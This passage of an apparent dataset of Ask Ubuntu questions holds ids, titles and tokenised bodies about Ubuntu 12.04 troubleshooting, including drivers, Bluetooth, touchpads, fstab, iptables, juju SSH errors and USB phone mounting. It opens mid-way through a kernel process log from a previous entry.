3537 1025 33 0 0 0 qmail-lspawn kernel : [ 3538 ] 2521 3538 1025 17 0 0 0 qmail-rspawn kernel : [ 3539 ] 2520 3539 1014 22 0 0 0 qmail-clean kernel : [ 3621 ] 0 3621 68797 3424 0 0 0 apache2 kernel : [ 3622 ] 0 3622 40565 1745 0 0 0 apache2 kernel : [ 3922 ] 106 3922 40087 38746 0 0 0 drwebd.real kernel : [ 3985 ] 0 3985 3163 37 0 0 0 mdadm kernel : [ 4024 ] 0 4024 1532 30 0 0 0 getty kernel : [ 24625 ] 0 24625 28299 11913 0 0 0 spamd kernel : [ 24626 ] 110 24626 28299 11912 0 0 0 spamd kernel : [ 24628 ] 110 24628 28299 11912 0 0 0 spamd kernel : [ 12008 ] 33 12008 68960 3226 0 0 0 apache2 kernel : [ 12016 ] 33 12016 68946 3232 0 0 0 apache2 kernel : [ 12568 ] 33 12568 68952 3229 0 0 0 apache2 kernel : [ 13362 ] 33 13362 68933 3220 0 0 0 apache2 kernel : [ 16894 ] 33 16894 68946 3204 0 0 0 apache2 kernel : [ 16895 ] 33 16895 68902 3189 0 0 0 apache2 kernel : [ 18991 ] 106 18991 40087 38745 0 0 0 drwebd.real kernel : [ 18992 ] 106 18992 40087 38745 0 0 0 drwebd.real kernel : [ 18993 ] 106 18993 40087 38745 0 0 0 drwebd.real kernel : [ 18994 ] 106 18994 40087 38745 0 0 0 drwebd.real kernel : [ 19165 ] 33 19165 68995 3216 0 0 0 apache2 kernel : [ 19178 ] 33 19178 68947 3225 0 0 0 apache2 kernel : [ 19918 ] 33 19918 68961 3218 0 0 0 apache2 if you need more information , write me . domaneni
161523	thinkpad t43p bluetooth wo n't toggle on	have ubuntu 12.04 running fine , everything works apart from the bluetooth . this seems to be a common problem to linux , it has worked previously with a windows install but has never functioned with either ubuntu 11.10 , mint maya , or 12.04 , but does work with xp . on the top right it appears to recognize the wireless chip currently the option to 'turn bluetooth off ' is there , however when i go into bluetooth settings the toggle is set to off and will not switch . no additional drivers are suggested , can you advise on how best to get it running ?
161525	how to install openjump ?	i 'm trying to install openjump in ubuntu 12.04 . they mentioned that it can be installed and run on linux : from the bin directory , run the starter for your operating system linux oj_linux.sh but for the life of me i ca n't find the bin directory in the source . does anybody know how to install this ? i do n't think it 's in any one of the repos either .
161530	dual boot with windows xp	now i 'm using windows xp , but i just planned for ubuntu.configeration of my pc is pentium 4 with 1gb of ram.is it good for dual boot ? another thing is now i 'm not able to play any hd videos.after installing ubuntu can i able to play all this stuff ?
161531	is network configuration necessary for ethernet ?	i am trying to connect my ubuntu system to the internet using ethernet cables . do i need to change any settings from the defaults ? thanks .
161532	how to permanently disable touchpad in 12.04 ?	i 'm looking for a way to permanently disable the touchpad in ubuntu 12.04 ( my computer is a lenovo thinkpad edge on which it is n't possible to disable it in the bios ) . i tried the applications gpointingdevicesettings and synaptiks 0.8.1 as well as the applets touchpad-indicator and jupiter . none of these does the trick of disabling the touchpad permanently . jupiter comes closest - it remembers that i have disabled the touchpad after restart - but when i login after the computer has been in suspend mode , the touchpad is enabled again . can anyone help me in disabling the touchpad possibly at a lower level so it wo n't in any way be enabled unless i choose to enable it ? i 'm totally new to linux so a detailed explanation would be much appreciated ... the links , so far , does n't address my question . i have no problem turning the touchpad off and making it stay off after reboot but when i login after the computer has been in an altered power mode it 's on again . is n't there a way to permanently disable a device like touchpad ?
161536	eclipse ide does not start	my computer suddenly shut down due to power failure , while i was working on an android project using my eclipse indigo ide . now , if i start eclipse , only an empty message dialog ( see screen shot ) appears and eclipse does not start . what can i do ? ( i am using ubuntu 12.04 lts )
161537	use second ubuntu desktop as external monitor	i have an ubuntu 12.04 installed on my imac and would like to use my other old imac , also running ubuntu 12.04 , as an external monitor . functionally if i were to move my cursor to the extreme right , as you would if you had a second monitor , it would switch to the other imac and would be using it . ca n't use twinview as both computers are not nvidia based . i used to have this functionality in winxp and it worked quite nicely because the 'second monitor ' could run intensive processes without interfering with my main computer because its running on a separate computer .
161540	geforce ( 410m with cuda ) screen resolution on ubuntu 12.04 issue	i made a succesful installation of ubuntu 12.04 64-bit on my sony vaio pcg-71811m . i have a geforce 410m with cuda , it seems works fine and i have already installed packages nvidia-current and nvidia-settings at version 302.17 ( i think it 's the latest in this moment ) , but my maximum screen resolution is 1366x768 ( and in the native display settings it 's the same thing ) . how can i switch it to an highest resolution , like 1920x1080 ?
161544	how does the fstab 'defaults ' option work ? is relatime recommended ?	i know the fstab defaults option means this : rw , suid , dev , exec , auto , nouser , async . but what if i want to add one more option , for example relatime , should i still add defaults too or they are applied anyway ? is it needed to add at least one option ? some examples : 1 . uuid=bfb42838-d866-4233-9679-96e7536356df /media/data ext3 defaults 0 2 2 . uuid=bfb42838-d866-4233-9679-96e7536356df /media/data ext3 0 2 3 . uuid=bfb42838-d866-4233-9679-96e7536356df /media/data ext3 defaults , relatime 0 2 4 . uuid=bfb42838-d866-4233-9679-96e7536356df /media/data ext3 relatime 0 2 is the ( 2 ) correct ( no option at all ) ? are the ( 1 ) and ( 2 ) the same ? are the ( 3 ) and ( 4 ) the same ? furthermore , i read in the ubuntu community documentation that in ubuntu 8.04 relatime was used as default for linux native file systems . is it still true for 12.04 ? if yes , then why do i see this if i use the mount command : /dev/sda2 on / type ext4 ( rw , errors=remount-ro ) if no , why not ? it is n't recommended to use relatime now ? i just wanted to apply it to my non system partitions , it is a good idea ? edit : i found an other command to list the mounted partitions and their options : cat /proc/mounts this is the result of a partition mounted with the defaults option in fstab : /dev/sdb2 /media/adat ext3 rw , relatime , errors=continue , barrier=1 , data=ordered 0 0 this is the output of mount for the same partition : /dev/sdb2 on /media/adat type ext3 ( rw ) and here is both result if the same partition mounted from nautilus as a non-root user : /dev/sdb2 /media/adat ext3 rw , nosuid , nodev , relatime , errors=continue , barrier=1 , data=ordered 0 0 /dev/sdb2 on /media/adat type ext3 ( rw , nosuid , nodev , uhelper=udisks ) so it looks like relatime is used if we mount an ext partition in 12.04 . so it is unneeded to add it manually . so my problem is broadly solved . but i still ca n't see why the options that should be in the defaults are not listed even with the cat /proc/mounts . maybe there is a third and even better method to list the partition mount options : )
161551	how to start/stop iptables in ubuntu 12.04 ?	i am using ubuntu 12.04 . while learning some new things about iptables i cant through this . see at the image . while i am trying to start , its saying as root @ badfox : ~ # iptables -l -n -v chain input ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination root @ badfox : ~ # service iptables stop iptables : unrecognized service root @ badfox : ~ # service iptables start iptables : unrecognized service source : http : //www.cyberciti.biz/tips/linux-iptables-examples.html why i am getting like this ? edit : so my firewall already started but why i am not getting the output as i mentioned in the link at source link in first workout . . here is my output root @ badfox : ~ # sudo start ufw start : job is already running : ufw root @ badfox : ~ # iptables -l -n -v chain input ( policy accept 4882 packets , 2486k bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 5500 packets , 873k bytes ) pkts bytes target prot opt in out source destination root @ badfox : ~ #
161553	using a custom protocol handler in firefox to run a shell script ?	what i 'd like to do is be able to start external programs from links in a local website . i 've defined a custom protocol handler in firefox by setting the following variables in about : config network.protocol-handler.external.myprotocol ; true network.protocol-handler.warn-external.myprotocol ; true this successfully causes firefox to open a 'launch application ' dialog box when i click on a link in the form myprotocol : ///path_to_program_i_want_to_run , and then i browse to the shell script i want to use and tell firefox to run it . unfortunately the script does n't seem to be run at all . i 've set the file permissions to 777 so firefox should n't have any trouble running it the shell script originally only contained the line $ 1 the idea being that the path of the link would be passed in as the first argument and would immediately be run as a program . this worked fine when i ran the script myself using commands like # ./run_program.sh gedit or # ./run_program.sh /home/ciaran/test_program the script now for testing purposes contains only the line echo `` testing '' > /testing/file.txt where 'testing ' is a directory with 777 permissions . also note that /testing/ actually is located at the root of my filesystem ( though i ca n't remember why i put it there ! ) , so i have n't just gotten mixed up between relative and absolute paths again , this runs perfectly fine when i run it from the terminal , and file.txt is created in the right location . with firefox though , i am given the option to choose an application to run , i choose that shell script , and it does n't seem to do anything . file.txt is not created at all , though there are no permission issues that i can see . so firefox just does n't seem to be running the script . i have also tried changing my about : config to contain network.protocol-handler.expose.camara ; true and network.protocol-handler.app.camara ; path/to/shell/script with no success
161557	driconf in ubuntu 64x plus ati gpu or something more ?	i 've been trying to get call of duty 2 to work in wine in ubuntu . it gives me a black screen . so i tried the fix suggested by the wine apphq and downloaded driconf . funny thing is that it ca n't find my direct rendering device . `` could not detect any configurable direct-rendering capable devices . driconf will be started in expert mode '' when i enter into it in expert mode is just errors out anyway . fglrxinfo gives me : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati mobility radeon hd 4200 series opengl version string : 3.3.11627 compatibility profile context that shows me my driver is installed correctl , y right ? world of goo which is linux native and requires direct rendering works like a charm . so i 'm wondering , is there some other workaround ? is there a bigger issue ? does me running 64-bit affect it at all ?
161558	how to delete all source codes and packages i have downloaded	i 've got a question regarding how to delete all source codes that i 've downloaded . i think it just consumes a lot of space without any benefit yet ! thanks in advance : )
161560	maas invalid ssh key	i would like to setup a maas for openstack with ubuntu 12.04 . everything workes great : marcel @ ubuntu20 : ~ $ juju status 2012-07-09 13:00:02,559 info connecting to environment ... the authenticity of host 'node1 ( 10.110.11.71 ) ' ca n't be established . ecdsa key fingerprint is 29:42:2c:7a : ef:52 : d4 : f8:63:51 : d8 : a1:1e : a9:16:0e . are you sure you want to continue connecting ( yes/no ) ? yes 2012-07-09 13:00:05,883 error invalid ssh key i read some more people have this issu not sure if it is a bug but i could n't find a working solution ... i read this posting with the same issue . i added a root user to this file that i can access the nodes : /var/lib/cobbler/kickstarts/maas.preseed : now i have access to the nodes and i created a user ubuntu with a password and copied the keys . now it lookes a little bit better i thought . marcel @ ubuntu20 : ~ $ juju status 2012-07-09 15:43:12,130 info connecting to environment ... warning : the ecdsa host key for 'node1 ' differs from the key for the ip address '10.110.11.71' offending key for ip in /home/marcel/.ssh/known_hosts:1 matching host key in /home/marcel/.ssh/known_hosts:8 are you sure you want to continue connecting ( yes/no ) ? yes a closer look showes me this issues : marcel @ ubuntu20 : ~ $ juju -v status 2012-07-09 15:36:49,458 debug initializing juju status runtime 2012-07-09 15:36:49,469 info connecting to environment ... 2012-07-09 15:36:49,588 debug connecting to environment using node1 ... 2012-07-09 15:36:49,589 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' node1 '' remote_port= '' 2181 '' local_port= '' 43964 '' . warning : the ecdsa host key for 'node1 ' differs from the key for the ip address '10.110.11.71' offending key for ip in /home/marcel/.ssh/known_hosts:1 matching host key in /home/marcel/.ssh/known_hosts:8 are you sure you want to continue connecting ( yes/no ) ? yes 2012-07-09 15:36:53,098:16474 ( 0x7f0c16d58700 ) : zoo_info @ log_env @ 658 : client environment : zookeeper.version=zookeeper c client 3.3.5 2012-07-09 15:36:53,098:16474 ( 0x7f0c16d58700 ) : zoo_info @ log_env @ 662 : client environment : host.name=ubuntu20 2012-07-09 15:36:53,098:16474 ( 0x7f0c16d58700 ) : zoo_info @ log_env @ 669 : client environment : os.name=linux 2012-07-09 15:36:53,098:16474 ( 0x7f0c16d58700 ) : zoo_info @ log_env @ 670 : client environment : os.arch=3.2.0-23-generic 2012-07-09 15:36:53,098:16474 ( 0x7f0c16d58700 ) : zoo_info @ log_env @ 671 : client environment : os.version= # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 2012-07-09 15:36:53,099:16474 ( 0x7f0c16d58700 ) : zoo_info @ log_env @ 679 : client environment : user.name=marcel 2012-07-09 15:36:53,099:16474 ( 0x7f0c16d58700 ) : zoo_info @ log_env @ 687 : client environment : user.home=/home/marcel 2012-07-09 15:36:53,099:16474 ( 0x7f0c16d58700 ) : zoo_info @ log_env @ 699 : client environment : user.dir=/home/marcel 2012-07-09 15:36:53,099:16474 ( 0x7f0c16d58700 ) : zoo_info @ zookeeper_init @ 727 : initiating client connection , host=localhost:43964 sessiontimeout=10000 watcher=0x7f0c14b886b0 sessionid=0 sessionpasswd= < null > context=0x367e940 flags=0 2012-07-09 15:36:53,100:16474 ( 0x7f0c118e2700 ) : zoo_info @ check_events @ 1585 : initiated connection to server [ 127.0.0.1:43964 ] 2012-07-09 15:36:53,100:16474 ( 0x7f0c118e2700 ) : zoo_error @ handle_socket_error_msg @ 1603 : socket [ 127.0.0.1:43964 ] zk retcode=-4 , errno=112 ( host is down ) : failed while receiving a server response 2012-07-09 15:36:56,434:16474 ( 0x7f0c118e2700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:43964 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-09 15:36:59,770:16474 ( 0x7f0c118e2700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:43964 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-09 15:37:03,107:16474 ( 0x7f0c118e2700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:43964 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-09 15:37:06,443:16474 ( 0x7f0c118e2700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:43964 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-09 15:37:09,779:16474 ( 0x7f0c118e2700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:43964 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-09 15:37:13,116:16474 ( 0x7f0c118e2700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:43964 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-09 15:37:16,452:16474 ( 0x7f0c118e2700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:43964 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-09 15:37:19,589 debug retrying connection : can not connect to environment using node1 ( perhaps still initializing ) : could not connect before timeout after 1 retries 2012-07-09 15:37:19,708 debug connecting to environment using node1 ... 2012-07-09 15:37:19,708 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' node1 '' remote_port= '' 2181 '' local_port= '' 60742 '' . warning : the ecdsa host key for 'node1 ' differs from the key for the ip address '10.110.11.71' of
161562	can i submit a ruby gem i 'm working on for ubuntu app showdown ?	i 've been working on a ruby project , can i submit this for app showdown ? basically its a sinatra app , runs a site on localhost , which plays songs in browser
161571	is there a system monitor lens ?	i really want to know if there is a system monitor lens out there . if this does n't exist , it would be awesome to see system properties in a lens such as hdd usage , ram , and another properties .
161574	help with bluetooth !	i made a video because i could not explain it with just typing , so if anyone could help me with this , i 'd be grateful and very happy . thanks in advance . http : //www.youtube.com/watch ? v=22cyvzhtb54
161575	weka windows always open in a different workspaces	this is how i installed weka 3.6.6 : sudo apt-get install weka on 12.04 every time i open weka it starts in the second workspace . if i move it to workspace # 1 , all the new windows it opens are in workspace # 2 . if i try and work in the 2nd workspace , new windows are opened in the 1st . there 's no way for me to avoid being hassled by weka . if i use myunity to have only 1x1 workspaces , weka opens , i can tell because it appears in the launcher . but i guess it 's in an invisible workspace as i ca n't see the window . i tried running some arbitrary game of life jar using java -jar gameoflife.jar and it opened in the current workspace . no problem . i tried downloading weka 3.7.6 and running weka.jar directly and it had the original problem too . this is the contents of /usr/bin/weka if it helps . # ! /bin/bash . /usr/lib/java-wrappers/java-wrappers.sh # default options class= '' weka.gui.guichooser '' memory= '' 512m '' gui= '' '' function usage ( ) { echo echo `` usage : $ { 0 # # */ } [ -m| -- memory < memory > ] [ -h| -- help ] [ -c| -- classname < classname > ] [ options ] '' echo echo `` starts the weka machine learning workbench . '' echo echo `` -h , -- help this help '' echo echo `` -c , -- class < class > '' echo `` start using an alternative class if no classname is '' echo `` given , then ' $ class ' is used by default . '' echo echo `` -g , -- gui < mdi|sdi > '' echo `` start weka gui as mdi or sdi '' echo echo `` -m , -- memory < memory > '' echo `` the amount of memory to use for the java virtual machine '' echo `` default : 256m ( = 256mb ) '' echo } temp=`getopt -o hc : m : g : -- long help , class : ,memory : ,gui : -n 'weka ' -- `` $ @ '' ` if [ $ ? ! = 0 ] ; then echo `` terminating ... '' > & 2 ; exit 1 ; fi eval set -- `` $ temp '' while true ; do case `` $ 1 '' in -c| -- class ) class= '' $ 2 '' ; shift 2 ; ; -m| -- memory ) memory= '' $ 2 '' ; shift 2 ; ; -g| -- gui ) gui= '' -gui $ 2 '' ; shift 2 ; ; -h| -- help ) usage ; exit 1 ; ; -- ) shift ; break ; ; * ) usage ; exit 1 ; ; esac done find_java_runtime openjdk6 sun6 || \ ( echo `` $ 0 : java not found , aborting . '' > & 2 & & exit 1 ) find_jars weka.jar java_args=-xmx $ memory run_java $ class $ gui $ @ i realize this may sound like a `` weka mailing list '' question , but the fact that myunity 1x1 makes weka completely invisible is probably a unity bug ...
161577	how do i start skype in the system tray ?	i have skype version 4 is set as one of my startup programs . whenever skype starts , it pops up in it 's full window mode . i would preferably like it to start as just an icon in the system tray .
161591	will a wubi install of ubuntu effect my windows installation in anyway ?	having never tried a linux os before , i want to dabble and take a look at one . ubuntu seems like a good distro to go with ( due to how popular it is ) and i want to use wubi to try it out . i just wanted to know if anything i do while trying out ubuntu will effect my windows installation or the files pertaining to it in anyway ? if so , is it potentially windows breaking ?
161593	quickly package -- extras does n't produce /opt/extras.ubuntu.com/../share/locale	i 'm trying to package an app to /opt , but when installed the app wo n't run and complains : traceback ( most recent call last ) : file `` /opt/extras.ubuntu.com/drawers/bin/drawers '' , line 45 , in < module > import drawers file `` /opt/extras.ubuntu.com/drawers/drawers/__init__.py '' , line 21 , in < module > locale.bindtextdomain ( 'drawers ' , '/opt/extras.ubuntu.com/drawers/share/locale ' ) nameerror : name 'locale ' is not defined i ca n't figure out what i need to change . is there a config file i need to alter ?
161595	where is the tool for password encryption in 12.04 ?	ubuntu at launchpad tells me to set up pgp keys by going to the passwords and encryption keys tool . however i can not find this program anyplace . in addition info is sparce on the net about ubuntu 's `` passwords and encryption keys tool . '' how to get it or find it ?
161597	screen resolution change	recently i have installed the plymouth manager andi accidentally set my resolution to 1024x768-24 which does not fit my laptop exactly and everytime my system reboots an error message shows that error : incorrect settings 1024x768-24 . i tried to change the resolution from the system settings > display but now only this 1024x768 is shown in the drop down . kindly help me to reset the display properties to default . plymouth is not responding wheni click on it and i want to uninstall it kindly help me in that too .
161605	what is the proper way to install the 3.4 kernel ?	kernel 3.2 has an annoying error for my wireless card ( rtl8192se-b ) that makes the connection drop and/or prevents the card to make a connection to the wireless router . dealing with it was very frustrating until i found out the bug was corrected in 3.4 . i downloaded : linux-headers-3.4.0-030400_3.4.0-030400.201205210521_all.deb linux-headers-3.4.0-030400_3.4.0-030400.201205210521_all.deb linux-image-3.4.0-030400-generic_3.4.0-030400.201205210521_amd64.deb and installed with : sudo dpkg -i * now the wireless works fine , but i have two problems that can not solve . the first one is minor : plymouth would not start at all . but if i boot with the 3.2 kernel it works fine . the second one is serious : sometimes the computer wo n't shut down or reboot . the x server terminates but the computer shows part of my grub background and will stay there forever using 100 % of the cpu . i have a toshiba qosmio with an core i7 and nvidia graphic card ( using nvidia-current ) . during one shutdown , i briefly read a message that said that the virtualbox module could n't be unloaded from the kernel . i tried to solve this by removing and purging virtualbox and installing it back . i do n't see the message anymore , but sometimes the computer wo n't shutdown nor reboot . am i missing something to properly configure the new kernels ?
161606	bcm4312 speed is very slow	04:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) 07:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm5906m fast ethernet pci express [ 14e4:1713 ] ( rev 02 ) above are the wired & wireless cards of my laptop lenovo g550 . i was a fedora user and than since i had some issues with fedora 17 i moved to ubuntu , i liked it but there are so many issues going on with broadcom cards , following are the issues i have faced and noticed always . my wireless card does not support hw550-3g - aztech routers , the lan works fine but the internet stops in less than a minute and its too annoying it never works again . if i download something from my dual boot windows , because i have 40mbps connection , it takes 2 minutes to download 50mb of file where ubuntu takes 8 minutes and the download speed is around 200kb/sec where windows boost upto 3mb/sec again wherever i go , page loading is dead slow . i tried even connecting usb wireless still there is no change in download speed . thinking that it might be the issue of my wireless card . please advise me if there are issues with broadcom or is there any driver update because whenever i try updating my driver it says , i ca n't because i have low powered bcm43xx card . should i change it or simply switch to windows or fedora again ?
161608	want to install windows 7	i have updated my ubuntu to 12.04 from 11.10 since then i am having problems regarding many issues such as nm-applet and touch pad is not working.so i have decided to shift back to win 7 but unfortunately i have not partitioned my disk but i still have 70 gb free.i need a way out to to first install win 7 ( dual boot ) then i need to uninstall ubuntu without deleting my data .any help would be appreciated .
161611	i have a grub menu display issue when booting up ubuntu 12.04 lts	when i boot up my dual boot windows 7 and ubuntu 12.04 lts the grub startup menu does not display on two of my computers using 1. an hp w2207 monitor with an asus pent111 computer . 2. my hp amd64 using lcd tvs one was a sony and the othe is an rca 50 inch tv . not a problem on my laptops though . this is not a boot up issue just a display issue.the oss still start after the default time or when i hit enter . any suggestions ?
161612	ubuntu not dicovering `` any '' hardware ?	i sodoed a code ( i had copied it from a website , i dont remember which ) to show `` all '' startup applications , without knowing the importance of `` detect-new-hardware-on-start-up '' option , i unchecked it and removed it from the list , now my touchpad , wifi , bluetooth , are not getting detected , i regret for messing it and help is badly/urgently needed , thanks .
161616	ubuntu install cd hangs at 5 red dots while booting	i put the disk in for 12.04 , go to the bios , and i boot off the disk , it works until the 5 dots go red when it is ready to load the desktop and it just hangs . worked before when i had windows and i installed ubuntu over it . i went to fedora because it looked cool , but i want to go back so i can run my minecraft server . any help ? i really want to install ubuntu again . dell inspiron 1300 currently has fedora 17 kde installed as primary operating system gets stuck finding the b43-phy0 . error : firmware file `` b43/ucode5.fw '' not found b43-phy0 . error : firmware file `` b43-open/ucode5.fw '' not found . b43-phy0 . error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version . please carefully read all instructions on this website . helpfull things @ j.naw did you do `` check disc for defects '' on the usb flash drive as well ? this applies to usb drives as well as cd/dvd media , and there can be systematic problems that cause multiple downloads to be corrupted or multiple writes to fail @ j.naw it 's unlikely to be caused by fedora , at least not directly ( there would have to be some bug in ubuntu that made it freeze when it looks at something in the fedora system ) . how did you install ubuntu before ? what version did you install -- was it this one ? also , please still do `` check disc for defects '' on the machine you want to install on because ( 1 ) that can reveal problems with the machine as well as the installation media , and ( 2 ) the media might really be bad , and just working on other machines with hardware not requiring the corrupted files to be used @ j.naw yes , the text-based alternate install cd might work . at this point though , as izx had suggested to me in chat , you might want to press escape ( or f2 ) when you first see the splash screen with the dots ( even before everything stops ) . that will reveal the messages `` behind '' it well there you go , one bug for ubuntu to fix . lets get to work .
161625	configuring and authenticating proxy on ubuntu 12.04 terminal	i am very new to ubuntu , i decided to try it out two days ago . i am using proxy server [ 41.74.91.139 with user name and password ] . i cant access any on-line resources both with the terminal , transmission ( to download torrents ) , or ubuntu software center . for firefox , i have configured it and can download .deb and other files but need direct access . please give me step by step instruction as to how to configure and authenticate 12.04 terminal . thank you
161626	sometimes 12.04 will mount phone as usb storage when i plug it in , and sometimes it wo n't	this is one of those low-grade irritations that 's really starting to bug me . when i plug a phone in ( i 've got two phones to try ) to a usb port , sometimes the system finds it and creates the /dev/ link , and sometimes it does n't . i see this from tailf /var/log/kern.log : jul 9 11:12:25 phoebe kernel : [ 4639695.952547 ] usb 3-2.2 : new high-speed usb device number 89 using xhci_hcd jul 9 11:12:25 phoebe kernel : [ 4639695.971935 ] usb 3-2.2 : ep 0x81 - rounding interval to 32768 microframes , ep desc says 0 microframes jul 9 11:12:25 phoebe kernel : [ 4639695.973489 ] scsi91 : usb-storage 3-2.2:1.0 jul 9 11:12:26 phoebe kernel : [ 4639696.974748 ] scsi 91:0:0:0 : direct-access htc android phone 0000 pq : 0 ansi : 2 jul 9 11:12:26 phoebe kernel : [ 4639696.975852 ] scsi 91:0:0:1 : cd-rom htc android phone 0000 pq : 0 ansi : 2 jul 9 11:12:26 phoebe kernel : [ 4639696.977035 ] sd 91:0:0:0 : attached scsi generic sg3 type 0 jul 9 11:12:26 phoebe kernel : [ 4639696.981009 ] sr1 : scsi-1 drive jul 9 11:12:26 phoebe kernel : [ 4639696.981135 ] sr 91:0:0:1 : attached scsi cd-rom sr1 jul 9 11:12:26 phoebe kernel : [ 4639696.981254 ] sd 91:0:0:0 : [ sdc ] attached scsi removable disk jul 9 11:12:26 phoebe kernel : [ 4639696.981414 ] sr 91:0:0:1 : attached scsi generic sg5 type 5 jul 9 11:12:30 phoebe kernel : [ 4639701.201420 ] sd 91:0:0:0 : [ sdc ] 20836352 512-byte logical blocks : ( 10.6 gb/9.93 gib ) jul 9 11:12:30 phoebe kernel : [ 4639701.203848 ] sdc : but lsusb shows the phone as in `` charge mode '' : bus 003 device 089 : id 0bb4:0ff9 high tech computer corp . desire / desire hd / hero ( charge mode ) same goes for the other phone . both phones are in `` usb storage '' mode . oddly enough , one of the phones ( a moto atrix ) has a memory card in it , and the memory card almost always mounts correctly , but the phone internal storage does n't . ( basically , when it works , that phone looks like two separate usb storage devices . ) sometimes i can plug/re-plug the phone a few times , and it works eventually . sometimes i have to reboot . ordinary usb storage ( memory sticks etc . ) i have no problems with . it 's only phones . is there some way to investigate further why it is that this is so flaky ? edit — ah - when i run fdisk on /dev/sdc after plugging in the phone , i see that there 's no partition table ( as far as linux can tell anyway ) . i suspect that 'd be a problem . edit again — durr well if i mount /dev/sdc it works fine . must be something about how i 've got something set up that makes the `` automount '' stuff in my desktop work or not . ( i generally do n't like automounting things anyway . ) thus : the problem was that i was expecting a partitioned file system , and ( perhaps ) so was something in my environment .
161630	i ca n't get the wireless to work in ubuntu 12.04 using sony vaio vpceb1e0e	hi i am using sony vio vpceb1e0e and i recently installed ubuntu 12.04 from the ubuntu website using windows installer . everything else works fine but i cant get the wireless to work . i used the ethernet to update ubuntu but still the wireless wo n't turn on . i ca n't even turn it on in settings then network then wireless . my wireless is turned on and works well in windows 7 . please can someone help me with this problem . i will be the most grateful . thank you in advance
161632	can i dual boot this all-in-one pc with ubuntu and windows 7 ?	we are thinking of buying this particular all-in-one pc , which comes with windows 7 . however , my father-in-law has always sworn by linux and my wife wo n't get it unless we can have both linux & windows on there ( she needs windows for her school work - she 's a teacher ) . is it possible to install linux on here as well as having windows ? this is the pc .
161636	installation stuck on `` initializing required components '' when trying to install adobe audition 3.0	i have installed adobe audition 3.0 using wine . the problem is that , when i am trying to launch it gets stuck on initializing required components when it 's loading . what can i do ?
161638	change version number in launchpad	while committing package to launchpad through quickly submit , version automatically jumped to current month , that is 12.07 . i did try to delete all milestones and re-upload the package . but every time , launchpad is rejecting submission due to `` version older than that in the archive '' . how to fix this ?
161640	what should i do if i did n't recieve the verification email for ubuntu one ?	i entered my email right , but i still did n't get the code .
161641	how can i search and locate a system folder	files & folders lens can be used to locate user 's documents easily , but it seems ignoring system files and folders . how can i search & locate system files and folders ? ( say for example i want to locate a folder named .metadata , which contains some settings of my eclipse ide , and i know that this folder is there in the file system somewhere but i do n't know where ) i use 12.04 lts
161648	unsolvable wow problems	i have direct rendering enabled on my ati radeon 4200 i have changed all of my registry and game settings to make it work correctly and well . but wow still wont run past 8 fps . i honestly have no other ideas ive searched all over google and tried everything . ive heard wow usually runs better on wine then on windows and i was getting 30-50 fps on windows so i would imagine id at least be able to get 20-60 on wine . im also running ubuntu 12.04 64bit and have installed all drivers and latest catalyst update .
161649	how do i disable all lid close processes ?	i want to be able to close my laptop without ubuntu registering it . i 've been looking everywhere and i 've found plenty of people with the same problem but no real solutions . obviously i have set the lid close setting to 'do nothing ' for both ac and battery , but when i close the lid it still blanks the screen , disconnects from external monitors , and brings up the lock screen when i reopen it . some people have suggested disabling the lock screen , but this does n't stop the screen blanking and external displays disconnecting , and i do n't want to disable the lock anyway , as i still want it when i tell ubuntu to lock or sleep or whatever else . others have suggested it 's something to do with acpi support , but i have tried changing some acpi scripts , and even removed them completely ( e.g . /etc/acpi/lid.sh and /etc/acpi/events/lidbtn ) and it makes no difference . there must be a bit of code somewhere that can just be removed or commented out or altered to prevent any lid close actions - does anyone know where ? i know this has been asked before , but i 'm getting really frustrated with this problem . i 'm disappointed to say that i 'm actually using windows 7 more often just because it 's quite happy to completely ignore the closed lid . so i just wanted to check , are we any closer to a real solution for this problem ?
161650	vga monitor wo n't display after nvidia driver install on ubuntu 12.04	i recently installed ubuntu 12.04 , and the first thing that came up was the driver manager , which told me to install the drivers for my nvidia graphics card ( i do n't remember what it is ) . i have a laptop and my screen is broken , so i must use an external monitor to see what is on my screen . after the install and restart , the external monitor is no longer detected . how can this be fixed ? i know the display still works after the install because i can see the bottom corner of my laptop screen , there is just no signal going to the external monitor anymore . when i revert back to before i installed the driver the external monitor will display again .
161651	choppy flash video playback , 'settings ' disabled for flash as well	i 'm using 12.04 classic gnome . lately , i have been experiencing choppy flash video playback . in youtube as well as in other sites . i tried installing flash-aid plugin for firefox and executed its wizard who installed another version of flash player player for me . but to no avail . one of the answers that i found was to 'disable hardware acceleration ' . unfortunately , the 'settings ' option while right-clicking is greyed out as well . i was not able to follow what they recommended in the following link : http : //forums.adobe.com/thread/891337 how can i remove the choppiness of the flash video playback ?
161652	how to change the default font size of xterm ?	xterm font is very small . how can i set it larger ?
